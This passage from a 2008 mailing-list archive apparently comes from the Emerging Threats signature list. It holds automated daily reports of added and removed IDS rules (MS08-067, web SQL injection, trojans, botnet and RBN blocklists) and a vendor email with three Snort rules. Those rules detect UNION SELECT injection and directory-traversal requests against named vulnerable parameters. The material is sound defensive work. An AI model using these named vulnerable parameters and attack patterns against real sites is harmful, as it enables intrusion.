url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008710 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (20) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008711 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 
(21) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008712 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (22) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008713 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (23) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008714 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (24) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008715 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (25) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008716 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (26) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008717 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (27) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008718 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (28) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008719 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (29) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008720 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (30) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008721 || ET 
EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (2) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008722 || ET WEB_SPECIFIC Simple Customer contact.php SQL injection || bugtraq,28852 2008723 || ET WEB_SPECIFIC ShopMaker product.php id Parameter Remote SQL Injection || bugtraq,31854 || url,www.milw0rm.com/exploits/6799 2008724 || ET WEB_SPECIFIC Bahar Download Script aspkat.asp SQL Injection || bugtraq,31852 2008725 || ET WEB_SPECIFIC WordPress Newsletter Plugin newsletter Parameter SQL Injection || url,secunia.com/advisories/32336 || url,milw0rm.com/exploits/6777 2008726 || ET TROJAN Gimmiv Infection Ping Outbound 2008727 || ET TROJAN Gimmiv Infection Ping Inbound 2008728 || ET TROJAN General Downloader URL - Post Infection 2400008 || ET DROP Spamhaus DROP Listed Traffic Inbound || url,www.spamhaus.org/drop/drop.lasso 2401008 || ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE || url,www.spamhaus.org/drop/drop.lasso 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org -> Added to emerging-sid-msg.map.txt (55): 2008678 || ET EXPLOIT Hummingbird Deployment Wizard 2008 ActiveX Insecure Methods || url,secunia.com/Advisories/32337/ 2008679 || ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (dish.php) || url,milw0rm.com/exploits/6762 || url,secunia.com/advisories/32308/ 2008680 || ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (menu.php) || url,milw0rm.com/exploits/6762 || url,secunia.com/advisories/32308/ 2008681 || ET MALWARE iframebiz - /qwertyuiyw12ertyuytre/adv***.php || url,www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DLOADR.QC&VSect=T || url,iframecash.biz 2008682 || ET TROJAN Trojan.Zonebac.D 2008683 || ET EXPLOIT Dart Communications PowerTCP FTP for ActiveX DartFtp.dll Control 
Buffer Overflow || url,www.milw0rm.com/exploits/6793 || bugtraq,31814 2008684 || ET WEB_SPECIFIC E-Shop Shopping Cart Script search_results.php SQL Injection || bugtraq,30692 2008685 || ET WEB_SPECIFIC Joomla DS-Syndicate Component feed_id SQL Injection || url,www.milw0rm.com/exploits/6792 || url,www.secunia.com/advisories/32321 2008686 || ET WEB_SPECIFIC zeeproperty adid Parameter Remote SQL Injection || url,milw0rm.com/exploits/6780 || url,secunia.com/Advisories/32333/ 2008687 || ET WEB PassWiki site_id Parameter Local File Inclusion || bugtraq,29455 2008688 || ET WEB_SPECIFIC XOOPS Makale Module id SQL Injection || url,www.milw0rm.com/exploits/6795 || url,secunia.com/advisories/32347/ 2008689 || ET TROJAN Gimmiv.A.dll Infection || url,www.microsoft.com/security/portal/Entry.aspx?name=TrojanSpy%3aWin32%2fGimmiv.A 2008690 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (1) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008691 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (2) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008692 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (3) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008693 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (4) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008694 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (5) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008695 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (6) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || 
url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008696 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (7) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008697 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (8) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008698 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (9) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008699 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (10) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008700 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008701 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (11) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008702 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (12) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008703 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (13) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008704 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (14) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008705 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow 
Inbound - MS08-067 (15) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008706 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (16) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008707 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (17) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008708 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (18) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008709 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (19) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008710 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (20) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008711 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (21) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008712 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (22) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008713 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (23) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008714 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (24) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 
2008715 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (25) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008716 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (26) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008717 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (27) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008718 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (28) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008719 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (29) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008720 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (30) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008721 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (2) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008722 || ET WEB_SPECIFIC Simple Customer contact.php SQL injection || bugtraq,28852 2008723 || ET WEB_SPECIFIC ShopMaker product.php id Parameter Remote SQL Injection || bugtraq,31854 || url,www.milw0rm.com/exploits/6799 2008724 || ET WEB_SPECIFIC Bahar Download Script aspkat.asp SQL Injection || bugtraq,31852 2008725 || ET WEB_SPECIFIC WordPress Newsletter Plugin newsletter Parameter SQL Injection || url,secunia.com/advisories/32336 || url,milw0rm.com/exploits/6777 2008726 || ET TROJAN Gimmiv Infection Ping Outbound 2008727 
|| ET TROJAN Gimmiv Infection Ping Inbound 2008728 || ET TROJAN General Downloader URL - Post Infection 2400008 || ET DROP Spamhaus DROP Listed Traffic Inbound || url,www.spamhaus.org/drop/drop.lasso 2401008 || ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE || url,www.spamhaus.org/drop/drop.lasso 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org -> Added to emerging-virus.rules (2): #by michael sconzo #ref 483dbf6dd97ec249b0ec84a358e39260 -> Added to emerging-web.rules (1): #by Stillsecure -> Added to emerging-web_sql_injection.rules (1): #by stillsecure [---] Removed non-rule lines: [---] -> Removed from emerging-drop-BLOCK.rules (2): # VERSION 1330 # Generated 2008-10-18 00:03:02 EDT -> Removed from emerging-drop.rules (2): # VERSION 1330 # Generated 2008-10-18 00:03:02 EDT From emerging at emergingthreats.net Sun Oct 26 15:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sun, 26 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081026200008.9C9D645026@goliath.jonkmans.com> [***] Results from Oinkmaster started Sun Oct 26 16:00:08 2008 [***] [+++] Added rules: [+++] 2008729 - SCAN Mini MySqlatOr SQL Injection Scanner (emerging-scan.rules) [///] Modified active rules: [///] 2008655 - ET MALWARE Frequently Used Fake trojan downloader User Agent (Windows 5.1 (2600). DMCP ver 2) (emerging-malware.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (2): 2008655 || ET MALWARE Frequently Used Fake trojan downloader User Agent (Windows 5.1 (2600). DMCP ver 2) 2008729 || SCAN Mini MySqlatOr SQL Injection Scanner || url,www.scrt.ch/pages_en/minimysqlator.html -> Added to emerging-sid-msg.map.txt (2): 2008655 || ET MALWARE Frequently Used Fake trojan downloader User Agent (Windows 5.1 (2600). 
DMCP ver 2)
2008729 || SCAN Mini MySqlatOr SQL Injection Scanner || url,www.scrt.ch/pages_en/minimysqlator.html

[---] Removed non-rule lines: [---]

-> Removed from emerging-sid-msg.map (1):
2008655 || ET MALWARE Frequently Used Fake trojan downloader User Agent

-> Removed from emerging-sid-msg.map.txt (1):
2008655 || ET MALWARE Frequently Used Fake trojan downloader User Agent

From signatures at stillsecure.com Mon Oct 27 10:02:10 2008
From: signatures at stillsecure.com (signatures)
Date: Mon, 27 Oct 2008 09:02:10 -0600
Subject: [Emerging-Sigs] StillSecure: 3 New Signatures - Oct-27-2008
Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290F@webmail.latis.com>

Hi Matt,

Please find 3 new signatures below:

1. KasraCMS index.php shme parameter SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"KasraCMS index.php shme parameter SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/index.php?shme="; nocase; uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; pcre:"/UNION\s+SELECT/Ui"; classtype:web-application-attack; reference:bugtraq,31918; reference:url,milw0rm.com/exploits/6837; sid:8529; rev:1;)

2. KasraCMS index.php cont parameter SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"KasraCMS index.php cont parameter SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/index.php?cont="; nocase; uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; pcre:"/UNION\s+SELECT/Ui"; classtype:web-application-attack; reference:bugtraq,31918; reference:url,milw0rm.com/exploits/6837; sid:8530; rev:1;)

3. Joomla Component Archaic Binary gallery Directory Traversal

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Joomla Component Archaic Binary gallery Directory Traversal"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/index.php?option=com_ab_gallery"; nocase; uricontent:"gallery="; nocase; pcre:"/(\.\.\/){1,}/"; classtype:web-application-attack; reference:url,secunia.com/advisories/32381/; reference:url,milw0rm.com/exploits/6826; sid:8531; rev:1;)

Looking forward to your comments, if any.

Thanks & Regards,
StillSecure
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081027/7432120f/attachment.html

From emerging at emergingthreats.net Mon Oct 27 15:00:08 2008
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Mon, 27 Oct 2008 16:00:08 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20081027200008.AF6B44502B@goliath.jonkmans.com>

[***] Results from Oinkmaster started Mon Oct 27 16:00:08 2008 [***]

[+++] Added rules: [+++]

2008730 - ET TROJAN Ipbill.com Related Dialer Trojan Checkin (emerging-virus.rules)
2008731 - ET TROJAN Ipbill.com Related Dialer Trojan Server Response (emerging-virus.rules)

[+++] Added non-rule lines: [+++]

-> Added to emerging-sid-msg.map (2):
2008730 || ET TROJAN Ipbill.com Related Dialer Trojan Checkin
2008731 || ET TROJAN Ipbill.com Related Dialer Trojan Server Response

-> Added to emerging-sid-msg.map.txt (2):
2008730 || ET TROJAN Ipbill.com Related Dialer Trojan Checkin
2008731 || ET TROJAN Ipbill.com Related Dialer Trojan Server Response

[---] Removed non-rule lines: [---]

-> Removed from emerging-sid-msg.map (2):
2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org
2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org

-> Removed from emerging-sid-msg.map.txt
(2): 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org From emerging at emergingthreats.net Tue Oct 28 15:00:09 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Tue, 28 Oct 2008 16:00:09 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081028200009.186324502D@goliath.jonkmans.com> [***] Results from Oinkmaster started Tue Oct 28 16:00:09 2008 [***] [+++] Added rules: [+++] 2406032 - ET RBN Known Russian Business Network Monitored Domains (33) (emerging-rbn.rules) 2406033 - ET RBN Known Russian Business Network Monitored Domains (34) (emerging-rbn.rules) 2406034 - ET RBN Known Russian Business Network Monitored Domains (35) (emerging-rbn.rules) 2406035 - ET RBN Known Russian Business Network Monitored Domains (36) (emerging-rbn.rules) 2407032 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (33) (emerging-rbn-BLOCK.rules) 2407033 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (34) (emerging-rbn-BLOCK.rules) 2407034 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (35) (emerging-rbn-BLOCK.rules) 2407035 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (36) (emerging-rbn-BLOCK.rules) [///] Modified active rules: [///] 2406000 - ET RBN Known Russian Business Network Monitored Domains (1) (emerging-rbn.rules) 2406001 - ET RBN Known Russian Business Network Monitored Domains (2) (emerging-rbn.rules) 2406002 - ET RBN Known Russian Business Network Monitored Domains (3) (emerging-rbn.rules) 2406003 - ET RBN Known Russian Business Network Monitored Domains (4) (emerging-rbn.rules) 2406004 - ET RBN Known Russian Business Network Monitored Domains (5) (emerging-rbn.rules) 2406005 - ET RBN Known Russian Business Network Monitored Domains (6) (emerging-rbn.rules) 2406006 - ET RBN Known 
Russian Business Network Monitored Domains (7) (emerging-rbn.rules) 2406007 - ET RBN Known Russian Business Network Monitored Domains (8) (emerging-rbn.rules) 2406008 - ET RBN Known Russian Business Network Monitored Domains (9) (emerging-rbn.rules) 2406009 - ET RBN Known Russian Business Network Monitored Domains (10) (emerging-rbn.rules) 2406010 - ET RBN Known Russian Business Network Monitored Domains (11) (emerging-rbn.rules) 2406011 - ET RBN Known Russian Business Network Monitored Domains (12) (emerging-rbn.rules) 2406012 - ET RBN Known Russian Business Network Monitored Domains (13) (emerging-rbn.rules) 2406013 - ET RBN Known Russian Business Network Monitored Domains (14) (emerging-rbn.rules) 2406014 - ET RBN Known Russian Business Network Monitored Domains (15) (emerging-rbn.rules) 2406015 - ET RBN Known Russian Business Network Monitored Domains (16) (emerging-rbn.rules) 2406016 - ET RBN Known Russian Business Network Monitored Domains (17) (emerging-rbn.rules) 2406017 - ET RBN Known Russian Business Network Monitored Domains (18) (emerging-rbn.rules) 2406018 - ET RBN Known Russian Business Network Monitored Domains (19) (emerging-rbn.rules) 2406019 - ET RBN Known Russian Business Network Monitored Domains (20) (emerging-rbn.rules) 2406020 - ET RBN Known Russian Business Network Monitored Domains (21) (emerging-rbn.rules) 2406021 - ET RBN Known Russian Business Network Monitored Domains (22) (emerging-rbn.rules) 2406022 - ET RBN Known Russian Business Network Monitored Domains (23) (emerging-rbn.rules) 2406023 - ET RBN Known Russian Business Network Monitored Domains (24) (emerging-rbn.rules) 2406024 - ET RBN Known Russian Business Network Monitored Domains (25) (emerging-rbn.rules) 2406025 - ET RBN Known Russian Business Network Monitored Domains (26) (emerging-rbn.rules) 2406026 - ET RBN Known Russian Business Network Monitored Domains (27) (emerging-rbn.rules) 2406027 - ET RBN Known Russian Business Network Monitored Domains (28) (emerging-rbn.rules) 
2406028 - ET RBN Known Russian Business Network Monitored Domains (29) (emerging-rbn.rules) 2406029 - ET RBN Known Russian Business Network Monitored Domains (30) (emerging-rbn.rules) 2406030 - ET RBN Known Russian Business Network Monitored Domains (31) (emerging-rbn.rules) 2406031 - ET RBN Known Russian Business Network Monitored Domains (32) (emerging-rbn.rules) 2407000 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (1) (emerging-rbn-BLOCK.rules) 2407001 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (2) (emerging-rbn-BLOCK.rules) 2407002 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (3) (emerging-rbn-BLOCK.rules) 2407003 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (4) (emerging-rbn-BLOCK.rules) 2407004 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (5) (emerging-rbn-BLOCK.rules) 2407005 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (6) (emerging-rbn-BLOCK.rules) 2407006 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (7) (emerging-rbn-BLOCK.rules) 2407007 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (8) (emerging-rbn-BLOCK.rules) 2407008 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (9) (emerging-rbn-BLOCK.rules) 2407009 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (10) (emerging-rbn-BLOCK.rules) 2407010 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (11) (emerging-rbn-BLOCK.rules) 2407011 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (12) (emerging-rbn-BLOCK.rules) 2407012 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (13) (emerging-rbn-BLOCK.rules) 2407013 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (14) (emerging-rbn-BLOCK.rules) 2407014 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (15) (emerging-rbn-BLOCK.rules) 
2407015 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (16) (emerging-rbn-BLOCK.rules) 2407016 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (17) (emerging-rbn-BLOCK.rules) 2407017 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (18) (emerging-rbn-BLOCK.rules) 2407018 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (19) (emerging-rbn-BLOCK.rules) 2407019 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (20) (emerging-rbn-BLOCK.rules) 2407020 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (21) (emerging-rbn-BLOCK.rules) 2407021 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (22) (emerging-rbn-BLOCK.rules) 2407022 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (23) (emerging-rbn-BLOCK.rules) 2407023 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (24) (emerging-rbn-BLOCK.rules) 2407024 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (25) (emerging-rbn-BLOCK.rules) 2407025 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (26) (emerging-rbn-BLOCK.rules) 2407026 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (27) (emerging-rbn-BLOCK.rules) 2407027 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (28) (emerging-rbn-BLOCK.rules) 2407028 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (29) (emerging-rbn-BLOCK.rules) 2407029 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) (emerging-rbn-BLOCK.rules) 2407030 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (31) (emerging-rbn-BLOCK.rules) 2407031 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (32) (emerging-rbn-BLOCK.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-rbn-BLOCK.rules (2): # VERSION 81 # Updated 2008-10-27 09:14:06 -> Added to 
emerging-rbn.rules (2): # VERSION 81 # Updated 2008-10-27 09:14:06 -> Added to emerging-sid-msg.map (10): 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org 2406032 || ET RBN Known Russian Business Network Monitored Domains (33) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406033 || ET RBN Known Russian Business Network Monitored Domains (34) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406034 || ET RBN Known Russian Business Network Monitored Domains (35) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406035 || ET RBN Known Russian Business Network Monitored Domains (36) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407032 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (33) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407033 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (34) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407034 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (35) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407035 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (36) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork -> Added to emerging-sid-msg.map.txt (10): 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org 2406032 || ET RBN Known Russian Business Network Monitored Domains (33) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406033 || ET RBN Known Russian Business Network Monitored Domains (34) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406034 || ET RBN Known Russian 
Business Network Monitored Domains (35) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
2406035 || ET RBN Known Russian Business Network Monitored Domains (36) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
2407032 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (33) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
2407033 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (34) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
2407034 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (35) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
2407035 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (36) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork

[---] Removed non-rule lines: [---]

-> Removed from emerging-rbn-BLOCK.rules (2):
# VERSION 80
# Updated 2008-10-08 09:28:13

-> Removed from emerging-rbn.rules (2):
# VERSION 80
# Updated 2008-10-08 09:28:13

From jonkman at jonkmans.com Wed Oct 29 09:34:46 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 29 Oct 2008 10:34:46 -0400
